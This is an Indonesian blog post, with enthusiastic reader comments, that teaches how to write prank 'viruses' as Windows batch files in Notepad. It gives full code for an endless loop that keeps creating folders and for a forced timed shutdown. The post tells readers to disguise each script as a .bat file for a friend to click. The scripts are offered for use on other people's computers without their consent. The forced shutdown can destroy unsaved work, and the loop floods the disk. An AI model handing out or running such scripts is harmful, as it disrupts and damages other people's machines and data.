Membuat Virus Sederhana Dengan Notepad

Kepingin kerjain temen gak sob? hhe pada postingan kali ini saya akan share tips dan trik bagaimana cara membuat virus namun gak berbahaya dan tentunya cara ini bisa dilakukan dimana saja karena prosesnya sangat simple dan tidak menggunakan software melainkan dengan menggunakan sebuah Notepad bawaan dari Windows bagaimana tertarik untuk mencobanya? cekidot,,

Ya nggak perlu basa-basi lagi nanti keburu jamuran kalau kebanyakan baca, tapi sebelumnnya baca do'a dulu ya,, xixi


Cara Membuat 1.000 Folder Dalam Sekejap :
  1. Buka Notepad
  2. Kemudian ketik/bisa juga dengan menggunakan copy-paste kode script berikut :
  3. Kode
    @echo off
    : top
    md %random%
    goto top
  4. Masukan kode di atas kedalam Notepad
  5. Setelah itu klik menu "File" -> "Save As..."
  6. Lalu ubah Save as typenya menjadi "All Files"
  7. Ketikan nama yang akan disave yang berakhiran ".bat" misalnya (awasadasule.bat) -> Save
  8. Hingga file tersebut menjadi seperti ini
  9. Apabila temen sobat mnegklik file tersebut, Jreng!! file tersebut akan menggundang banyak folder.
  10. Selesai
Cara Membuat Komputer Menjadi Shut Down Dengan Sendirinya :

Caranya sama dengan cara yang diatas hanya berbeda dengan kode scriptnya ini dia
Kode
@echo
shutdown -s -t "waktu dalam detik(tanpa kutip)" -f
*Keterangan maksud dari "waktu dalam detik(tanpa kutip)" ini adalah sobat bisa mengetikan angka yang sobat mau misalnya 1=detik berarti script itu berkerja dalam 1 detik untuk menshut down secara otomatis.

Sekian Tips dan Trik dari saya Semoga Bermanfaat.

Sumber : http://www.kaskus.us/showthread.php?t=7899483

12 Comments

Windows 7 Blog said... [Reply Comment]

wahahaa!
dalam menyambut AprilMop nih, kita jahilin komputer temen!
thanks ya sobat,,,

Anonymous said... [Reply Comment]

Mantap gan ,,
ane adalah salah satu pengggemar agan ,,, dengan sowftware" nya , yg Ebatt n Full Version ...
terus update y gan softwarenya ,,, ane pasti sedot gan ,, hhe

www.ex-dot.com IS tHe Best !!!

extreme said... [Reply Comment]

gan request idm terbaru sih..
thx..

zhanaz45 said... [Reply Comment]

Langsung coba sobb, pengen liat 1.000 folder yang di maksud sobattt hehee..

iplock said... [Reply Comment]

wah ada cara jail nih,mantep gan,hehee,....
ijin copas ya

vfly47 said... [Reply Comment]

wkwk jail ni sobat..tapi gak apa share ilmunya...
cz ane dlu juga maniak..jailin warnet orang ^^v

agoez said... [Reply Comment]

mantap ni blognya agan,,gue bru mampir n buka2 isinya maknyos bgt,,hehe,,tru update ya mantap2 gan,,

ForFreeAll said... [Reply Comment]

ke Blog Saya ..
http://forfreeall.blogspot.com
Hehe Keren Juga Buat Ngerjain orang kwkwkwkwk
ke blog w jgn lupa

Anonymous said... [Reply Comment]

kalo buat virus yg rumit tanpa software bisa ??

EX-DOT said... [Reply Comment]

@Anonymous biasanya klw buat virus yang dalam "" berbahaya rata2 menggunakan software sob,,

Share Our Knowledge | Software Akuntansi said... [Reply Comment]

lumayan nih sob tipsnya, buat nakutin orang. wkwkwk

Anonymous said... [Reply Comment]

permisi gan...maap newbie
trus cara ngilangin viruse gimana Gan...

Post a Comment - Back to Content

Gunakan kata-kata sopan dalam berkomentar. Komentar yang mengandung SPAM, SARA, Pornografi dsb yang mengandung kata-kata yang tidak patut untuk di komentarkan (mohon maaf) akan kami hapus.